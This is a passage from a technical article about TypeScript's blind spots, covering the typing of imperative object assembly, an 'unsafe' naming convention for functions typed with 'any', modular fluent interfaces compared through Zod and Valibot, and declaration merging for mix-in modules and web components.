For the second case, the solution is simple: don’t use the type system for this task. Trying to exclude subtypes is essentially working against what TypeScript is designed to do (a type system based on structural subtyping) and attempting to compensate for a limitation within TypeScript itself. A more pragmatic approach would be to simply defer the distinction between two types that TypeScript has assessed incorrectly to the runtime. In the case of Set and WeakSet, this is particularly trivial because JavaScript knows that these two objects are unrelated (Listing 13).

Listing 13: Runtime distinction between Set and WeakSet

new WeakSet() instanceof WeakSet
// > true

new Set() instanceof WeakSet
// > false

“Make invalid states unrepresentable” is still a valuable guideline. However, in TypeScript, we sometimes need to use methods other than the type system to implement this, because the type system can’t accurately model every relationship between JavaScript objects. The type system only looks at the API surfaces of objects, and sometimes seemingly related surfaces hide entirely different semantics. In such cases, we shouldn’t use the type system to solve the problem but rather use a more appropriate solution.

Blind Spot 2: Non-Modelable Intermediate States

Combining an object from a list of keys and a parallel list of values of the same length is trivial in JavaScript, as we see in Listing 14.

Listing 14: JS function combines two lists into one object

function combine(keys, vals) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

let res = combine(["foo", "bar"], [1337, 9001]);

// res = { foo: 1337, bar: 9001 }

Imperative programming doesn’t get any easier than this: you take a bunch of variables and manipulate them until the program reaches the desired target state. But as we all know, this programming style can be error-prone. Every for loop is an off-by-one error in training. So it makes sense to secure this code snippet as thoroughly as possible with TypeScript.

First, we need to ensure that keys and values are tuples (i.e. lists of finite length). The content of keys should be restricted to valid object key data types, while values can contain any values, but must have the exact same length as keys. This isn’t particularly difficult: we can constrain the type variable K for keys to be a tuple with matching content, and then use K as a template to create a tuple of the same length full of any, which is exactly the appropriate restriction for values (Listing 15).

Listing 15: Function signature restricted to two tuples of equal length

type AnyTuple<Template extends any[]> = {
  [I in keyof Template]: any;
};

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  // ... Rest ...
}

With a type K of all keys and a type V of all values, we can then construct an object type that describes the result of the combine() operation. This is a bit complex, but we can manage. First, we need the auxiliary type UnionToIntersection< T >, which, as the name suggests, turns the members of a union T into an intersection type. The syntax looks a bit weird, and the underlying mechanics of distributive conditional types are equally strange. Overall, I prefer not to dive into the details right now. The key takeaway is that UnionToIntersection< T > turns a union into an intersection (Listing 16).

Listing 16: UnionToIntersection< T >

type UnionToIntersection<T> =
  (T extends any ? (x: T) => any : never) extends
  (x: infer R) => any ? R : never;

type Test = UnionToIntersection<{ x: number } | { y: string}>
// Test = { x: number } & { y: string }
 

With this tool, we can now model a type that, similar to the combine() function, combines two tuples into one object, if we can think creatively. Step 1 is to write a generic type that accepts the same type parameters as combine() (Listing 17).

Listing 17: Type Combine<K, V>

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = {}

Step 2: A new tuple is temporarily created with a mapped type that has the same number of positions as K and V (Listing 18).

Listing 18: Two tuples become one tuple

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: any;
}

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [any, any]

At first glance, this maneuver seems to distract us from our actual goal, as we want to turn tuples into an object, not just another tuple. However, to do this, we need access to the indices of the input tuples, which is achieved here by the type variable index. This allows us to replace any on the right side of the mapped type with an object type that models a name-value pair of our target object (Listing 19).

Listing 19: Two tuples become one tuple of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [{ foo: 1337 }, { bar: 9001 }]

Now we get a tuple that at least contains all the building blocks of our target object. To unpack it, we index the tuple with number, which leads us to a union of the tuple contents (Listing 20). We can then combine this union into an object type using UnionToIntersection< T > (Listing 21). Mission accomplished!

Listing 20: Two tuples become a union of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
}[number];

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337 } | { bar: 9001 }

Listing 21: Two tuples become one object

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = UnionToIntersection<{
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
}[number]>;

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337, bar: 9001 }
// Genaugenommen { foo: 1337 } & { bar: 9001 }

The result is syntactically a bit strange, but at the type level it does what the combine() function does in the runtime area: two tuples in, combined object out (Listing 22).

Listing 22: Combine Type vs. Combine Function

type Test = Combine<[“foo”, “bar”], [1337, 9001]>;
// Type “Test” = { foo: 1337, bar: 9001 }

let test = combine([“foo”, “bar”], [1337, 9001]);
// Value “test” = { foo: 1337, bar: 9001 }

And if we have a type that models the exact same operation as a runtime function, we can logically use the former to annotate the latter. Right?

The problem with the imperative iteration

Before we add Combine<K, V> to the signature of combine(keys, values), we should fire up TypeScript and ask what it thinks of the current state of our function (without return type annotation). The compiler is not impressed (Listing 23).

Listing 23: Current state of combine()

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i]; // <- Error here
  }
  return obj;
}

The key part of the error message is “No index signature with a parameter of type ‘string’ was found on type ‘{}’”. The reference to the type {} comes from the initialization of the obj variable two lines earlier. Since there is no type annotation, the compiler activates its type inference and determines the type {} for obj, based on its initial value– the empty object. Naturally, this means we can’t add any additional fields to this type. But is this type even correct? After all, the function is supposed to return Combine<K, V> as the type. So we add to the initialization what the variable should have at the end (Listing 24).

Listing 24: combine() with Combine<K, V> as annotation

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: Combine<K, V> = {}; // <- Error here
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

Another error appears. This time, TypeScript reports “Type ‘{}’ is not assignable to type ‘Combine<K, V>’”, which is also understandable. After all, we’re claiming that the variable obj contains the type Combine<K, V> but we’re initializing it with the incompatible value {}. That can’t be correct either. So, what is the correct approach?

The truth is, nothing is correct. The operation that combine(keys, values) performs is not describable with TypeScript in the way it’s implemented here. The problem is that the result object obj mutates from {} to Combine<K, V> in several intermediate steps during the for loop, and that TypeScript doesn’t understand such state transitions. The whole point of TypeScript is that a variable has exactly one type, and it can’t change types (unlike in vanilla JavaScript). However, such type changes are essential in scenarios where objects are iteratively assembled because each mutation represents a new intermediate state on the way from A to B. TypeScript can’t model these intermediate states, and there is no correct way to equip the combine(keys, values) function with type annotations.

iJS Newsletter

Keep up with JavaScript’s latest news!

What to do with intermediate states that can’t be modeled?

The TypeScript type system is a huge system of equations in which the compiler searches for contradictions. This always happens for the program as a whole and without executing the program. This means that, by design, TypeScript can’t fully understand various language constructs and features, no matter how hard we try. Under these circumstances, the question arises: if we can’t do it right, what should we do instead?

One option is to align the runtime code more closely with the limitations of the type system. After all, there are various means of functional programming in runtime JavaScript. Instead of writing types that are oriented towards runtime JavaScript, it’s often possible to write runtime JavaScript that is based on the types. However, this doesn’t always work and may not be feasible in some teams. Some developers may enjoy writing JavaScript code in such a way that every loop is replaced by recursion, while others would like to keep their imperative language constructs, especially async/await and try/catch.

The more pragmatic solution is to accept the possibilities and limitations of our tools and work with what we have. Unmodelable intermediate states are bound to occur when writing low-level imperative code. If the type system can’t represent them, we need to handle them in other ways. Unit tests can ensure that the affected functions do what they’re supposed to do, documentation and code comments are always helpful, and for an extra layer of safety, we can use runtime type-checking if needed.

I’ve adapted a feature from the programming language Rust for functions with an imperative core that is inscrutable for TypeScript. Rust’s type system is stricter than TypeScript’s, enforcing much more granular rules of data and objects. However, there is a way out: code blocks marked with the unsafe keyword can (to some extent) perform operations that the type system would normally prevent (Listing 25).

Listing 25: unsafe in Rust

// This Rust program uses the C language's foreign
// function interface for the abs() function,
// which the Rust compiler cannot guarantee anything about
extern "C" {
  fn abs(input: i32) -> i32;
}

// To be able to call the C function abs() without
// the corresponding code must be wrapped in “unsafe”
fn main() {
  unsafe {
    println!(
      "Absolute value of -3 according to C: {}",
      abs(-3)
    );
  }
}

In its core idea, it’s somewhat comparable to the TypeScript type any, as in both cases developers assume responsibility for what the type checker would normally do. The advantage of unsafe in Rust is that it directly signals that the compiler doesn’t guarantee type safety for the affected area and that maximum caution is required when using it. This is precisely what we want to express for our combine(keys, values) function. First, we have to get the function to work by typing the result object as any (Listing 26).

Listing 26: combine() with any

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: any = {}; // <- anything goes
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

This makes the code in the function executable and the compiler no longer complains, since any allows everything. We can now use our type Combine<K, V> to annotate the return type (Listing 27).

Listing 27: combine() with any and Combine<K, V>

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {  // <- works
  /* Rest */
}

This works because the type any also allows it to be assigned to another, stricter type. This function now has a very well-defined interface with strict input and output types, but a core that isn’t protected by the type system. For trivial functions, it’s sufficient to ensure correct functioning with unit tests, and to make the character of the function even more obvious you could add unsafe to its name (Listing 28).

Listing 28: unsafeCombine()

function unsafeCombine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {
  /* Rest */
}

Anyone who calls this function can tell from its name that special care is required. Reading the source code makes it clear that the any annotation on the return object wasn’t added out of desperation, time pressure, or inexperience by the developers, but rather as a workaround for a TypeScript blind spot based on careful consideration. No tool is perfect (especially not TypeScript), and dealing with a tool’s limitations confidently and pragmatically is the hallmark of true professionals.

Blind spot 3: Side effects of mix-in modules

For most developers, ECMAScript modules are synonymous with the keywords import and export, but these don’t determine whether a piece of JavaScript is considered a module. For a JS engine, “ECMAScript module” is primarily a separate loading and operating mechanism for JavaScript programs in which

  1. Permanent strict mode applies without opt-out
  2. Programs, similar to scripts with the defer attribute, are loaded asynchronously and executed in browsers only at the DOMContentLoaded event
  3. import and export can be used

Thus, the following JavaScript program can be considered and treated as an ECMAScript module:

// hello.js
window.alert(“Hello World!”);

This mini-module contains no code that violates strict mode. It can handle contact with a fully processed DOM without crashing and can be easily loaded as a module by browsers:

<script type=“module” src=“hello.js”></script> 

The presence of the keywords import and export indicates that a JavaScript program is intended to be a module and is only executable in module mode. However, their absence doesn’t mean a program can’t be a module. In most cases, using import and/or export in modules makes sense, but not always: For example, if you want to activate a global polyfill, you don’t have to export anything. Instead, you can directly modify the relevant global objects. This use case may seem a bit unusual (after all, who regularly writes new polyfills?), but the world might be a little better if this use case weren’t so rare.

Modularity vs. fluent interfaces

Zod is a popular and powerful data validation library for JavaScript and TypeScript. It offers a highly convenient, fluent interface for describing data schemas, validates data against those schemas, and, as a special treat, can derive TypeScript types from the schemas (Listing 29).

Listing 29: Zod in action

import { z } from "zod";

const User = z.object({
  name: z.string(),
  mail: z.string().email(),
});

User.parse({
  name: "Test",
  mail: "[email protected]",
}); // > OK, no error

type User = z.infer<typeof User>;
// > TS-Type { name: string, mail: string }

The fluent interface with the simple chaining of method calls makes Zod particularly attractive. However, this chaining comes at a price: the z object contains every schema validation feature of Zod at all times, even if, as in the example above, only the objectstring, and email functions are used. The result is that, when compiled and minified with esbuild, the 14 lines of code shown above turn into a bundle of over 50 kB. For frontend applications where loading performance is an issue, the use of Zod is therefore out of the question.

This doesn’t mean there is anything wrong with Zod. The inclusion of the entire library’s code in the bundle, even when only one feature is used, is an unavoidable result of its highly convenient API design. This isn’t an issue when used on the server side. For Zod to work, the z object must be a normal JavaScript object with all the features, which means that bundler-based tree-shaking dead code elimination can’t be applied. The Zod developers decided to trade a better API design for a larger bundle—perhaps because the “frontend” use case was not that important to them, or because they considered convenience and developer experience to be more important. And that’s perfectly fine.

For comparison, the self-proclaimed “<1-kB Zod alternative” Valibot uses a completely different API design to Zod to take up only a few bytes (Listing 30).

Listing 30: Valibot in action

import {
  type Output,
  parse,
  object,
  string,
  email,
} from "valibot";

const User = object({
  name: string(),
  mail: string([email()]),
});

parse(User, {
  name: "Test",
  mail: "[email protected]",
}); // > OK, no error

type User = Output<typeof User>;
// > TS-Type { name: string, mail: string }

We see the same feature set as Zod with just one key difference: the fluent interface is no longer supported. Chained conditions (e.g., “this must be a string and the string must be an email address”) are modeled by manually imported and manually concatenated functions. This makes module bundlers like esbuild tree shaking easy, but the API is no longer as convenient.

In other words, fluent interfaces are nice, but they don’t always align with the performance optimizations necessary for frontend performance. Or do they?

The Versatile Swiss Army Knife (in JavaScript)

A Zod-style fluent interface can be implemented in JavaScript as well as in TypeScript using a few object methods that return this (Listing 31).

Listing 31: Basal Fluent Interface

const fluent = {
  object() {
    return this;
  },
  string() {
    return this;
  },
  email() {
    return this;
  },
}

fluent.string().email(); // Runs!

Suppose we step away from the constraints of type safety and delve into pure JavaScript. In that case, we can construct the object provided by the fluent interface, rather than declaring it centrally (Listing 32).

Listing 32: Piece-wise fluent interface

const fluent = {};

fluent.object = function() {
  return this;
};

fluent.string = function() {
  return this;
};

fluent.email = function() {
  return this;
};

fluent.string().email(); // Success!

In JavaScript, there’s no reason not to split the piecemeal assembly into individual modules. We just need to ensure that there is some kind of singleton for the Fluent object, which could be implemented, for example, by a core module imported everywhere (Listing 33).

Listing 33: Modularized Fluent Interface

// Core Module "fluent.js"
const fluent = {};
export { fluent };

// Module "object.js"
import { fluent } from "./fluent.js";
fluent.object = function () {
  return this;
};

// Module "string.js"
import { fluent } from "./fluent.js";
fluent.string = function () {
  return this;
};

// Module "email.js"
import { fluent } from "./fluent.js";
fluent.email = function () {
  return this;
};

The core module fluent.js initializes an object that is imported and extended by all feature modules. This means that only explicitly imported features can be used (and take up kilobytes), but we retain a fluent interface comparable to Zod (Listing 34).

Listing 34: Modularized Fluent Interface in Action

// main.js
import { fluent } from “./fluent.js”;
import “./string.js”; // patches string into “fluent”
import “./email.js”; // patches email into “fluent”

fluent.string().email(); // Works!
fluent.object(); // Error: object.js not imported

This minimal implementation of the modular Fluent pattern is clearly just a demonstrator showing what could be possible in principle: modularity and method chaining peacefully united. Only few people write their own polyfill where modules are pure side effects that patch arbitrary objects. But why not? After all, we could have fluent interfaces and tree shaking. Admittedly, there is a small detail known as “TypeScript” that complicates matters.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Declaration merging, but unconditionally

TypeScript is no stranger to the established JavaScript practice of patching arbitrary objects. It’s an official part of the language via declaration merging. If we create two interface declarations with identical names, this isn’t considered a naming collision, but a distributed declaration (Listing 35).

Listing 35: Declaration Merging

interface Foo {
  a: number;
}

interface Foo {
  b: string;
}

declare let x: Foo;
// { a: number; b: string }

TypeScript uses this mechanism primarily to support extensions of string-based DOM APIs, such as document.createElement(). This function is known to be able to fabricate an instance of an appropriate type from an HTML tag (Listing 36).

Listing 36: document.createElement() in action

let a = document.createElement(“a”);
// a = HTMLAnchorElement
let t = document.createElement(“table”);
// t = HTMLTableElement
let y = document.createElement(“yolo”);
// y = HTMLElement (base type)

It’s true that document.createElement(), from which the HTML tag creates an instance of HTMLAnchorElement, considers the tag table to be a default for an HTMLTableElement. And, as of August 2024, no specified element < yolo > exists. But how does TypeScript know all this? The answer is simple: at the core of TypeScript’s DOM type definitions, there is a large interface declaration that maps HTML tags to subtypes of HTMLElement (Listing 37).

Listing 37: HTMLElementTagNameMap

interface HTMLElementTagNameMap {
  "a": HTMLAnchorElement;
  "abbr": HTMLElement;
  "address": HTMLElement;
  "area": HTMLAreaElement;
  "article": HTMLElement;
  "aside": HTMLElement;
  "audio": HTMLAudioElement;
  "b": HTMLElement;
  ...
}

The type definition of document.createElement() uses type-level programming to derive from this interface the type of instance the function returns for a given HTML tag – with the basic HTMLElement as a fallback level for unknown HTML tags. And what do we do when unknown HTML tags become known HTML tags through Web Components? We merge new fields into the interface.

Listing 38: Declaration merging for web components

export class MyElement extends HTMLElement {
  foo = 42;
}

window.customElements.define("my-el", MyElement);

declare global {
  interface HTMLElementTagNameMap {
    "my-el": MyElement;
  }
}

let el = document.createElement("my-el");
el.foo; // number - el is a MyElement

The class declaration or the call to customElements.define() tells the browser at runtime that a new HTML element with a matching tag now exists, while the global interface declaration informs the TypeScript compiler about this new element. It’s therefore possible to extend global objects and have TypeScript record them correctly, and it is not even particularly difficult.

What happens if we move the above web component into its own module in our TypeScript project, fail to import this module, and still call document.createElement(“my-el”) (Listing 39)?

Listing 39: Unconditional Declaration Merging

// Import disabled!
// import “./component”;

const el = document.createElement(“my-el”);
el.foo; // number - el is still a MyElement

The commented-out component remains completely unknown to the browser, while TypeScript still assumes that the affected HTML tag can be used. This happens because TypeScript types are considered on a per-package basis. If a global type declaration is part of an imported package, it’s considered to be in effect. At the individual module level, TypeScript can’t understand that specific imports are needed to implement the effect of the declared types at runtime.

What to do about the side effects of mix-in modules?

In principle, managing TypeScript cleanly requires a somewhat blunt perspective: since TypeScript considers types on a per-package rather than a per-module basis, we can convert relevant modules into (quasi-)packages. Depending on the build setup, this can require more or less effort. The main step is to create a new folder for our module packages in the project and to use the exclude option to remove it from the view of the main project’s tsconfig.json. The modules can now be moved to the folder hidden from the compiler, meaning that TypeScript doesn’t process any type declarations within them when the corresponding modules/packages are actually imported.

The tricky question now is what our project and build system will accept as a “package”. If we don’t run the TypeScript compiler tsc at all or only with the options emitOnly or emitDeclarationOnly (i.e. when the TypeScript compiler doesn’t have to output JavaScript, but at most d.ts files), we can activate the compiler option allowImportingTsExtensions. This allows us to directly import the .ts files from the module packages folder, and thus activate only those global declarations that are actually imported (Listing 40).

Listing 40: Conditional declaration merging through packages

// packages/foo/index.ts
declare global {
  interface Window {
    foo: number; // new: window.foo
  }
}
export {}; // Boilerplate, ignore!

// packages/bar/index.ts
declare global {
  interface Window {
    bar: string; // new: window.bar
  }
}
export {}; // Boilerplate, ignore!

// index.ts
import "./packages/foo/index.ts";
window.foo; // <- Imported, works!
window.bar; // <- Not imported, error!

If, on the other hand, we need the JavaScript output of tsc, it gets a bit more complicated. In this case, the compiler option allowImportingTsExtensions isn’t available and the module packages have to be upgraded to more or less “correct” packages, including their own package.json. Depending on how many such “packages” you want to end up with in your project, this additional effort can either remain manageable or escalate into something completely unacceptable.

Side effects of mix-in modules remain a blind spot of TypeScript because the types known to the TypeScript compiler are determined at the package level, not ECMAScript modules, due to its fundamental design. Any workaround we can come up with has major or minor drawbacks. We can either accept them, try to minimize their effects by adjusting our project or build set-up, or simply accept the blind spot. But is it really a problem if the type system thinks an API is available when it isn’t? For a module with a fluent Interface, definitely. For web components, maybe not. And for other use cases? It depends on the circumstances.

iJS Newsletter

Keep up with JavaScript’s latest news!

Conclusion: TypeScript isn’t perfect

TypeScript aims to describe JavaScript’s behavior using a static type system, and it does this far better than we might expect. Almost every bizarre behavior of JavaScript can be partially managed by the type checker, with true blind spots existing only in a few peripheral aspects. However, as we’ve seen in this article, these fringe aspects are not without practical relevance, and as TypeScript professionals, we need to acknowledge that TypeScript is not perfect.

So how do we deal with these blind spots in our projects? Personally, I’m a big fan of a pragmatic approach to using tools of all kinds. Tools like TypeScript are machines that we developers operate, not the other way around. When in doubt, I prefer to occasionally accept an any or a few data types that are 99% correct. If an API can be significantly improved through elaborate type juggling, it may justify spending hours in the type-level coding rabbit hole.

However, fighting against the fundamental limitations of TypeScript is rarely worth the effort. There is no prize for the smallest possible any number, no bonus for particularly complex type constructions, and no promotion for a function definition that is 0.1% more watertight. What matters is a functioning product, maintainable code, and efficiency in execution and development – always considering what is possible given the current circumstances and available tools.

The post TypeScript’s Limitations and Workarounds appeared first on International JavaScript Conference.

]]>